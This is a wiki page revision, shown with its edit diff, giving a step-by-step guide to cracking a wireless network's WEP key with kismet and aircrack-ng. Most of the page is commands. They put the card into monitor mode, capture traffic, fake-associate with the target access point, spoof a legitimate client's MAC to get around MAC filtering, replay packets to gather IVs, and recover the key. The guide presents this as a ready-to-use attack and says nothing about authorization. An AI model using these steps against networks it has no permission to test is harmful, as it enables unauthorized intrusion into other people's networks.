Difference between revisions of "Cracking A WEP Key"
Jump to navigation
Jump to search
m |
m |
||
Line 1: | Line 1: | ||
+ | See http://www.aircrack-ng.org/doku.php?id=tutorial | ||
+ | |||
*Install kismet, kismet-plugins and aircrack-ng packages | *Install kismet, kismet-plugins and aircrack-ng packages | ||
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked | *Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked |
Revision as of 15:58, 14 December 2010
See http://www.aircrack-ng.org/doku.php?id=tutorial
- Install kismet, kismet-plugins and aircrack-ng packages
- Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile --channel <channel> mon0
If you don't get enough traffic from the access point on that channel. start a new terminal session:
- Associate with the target AP
aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.
- Start replaying packets so that we can collect more packets:
aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs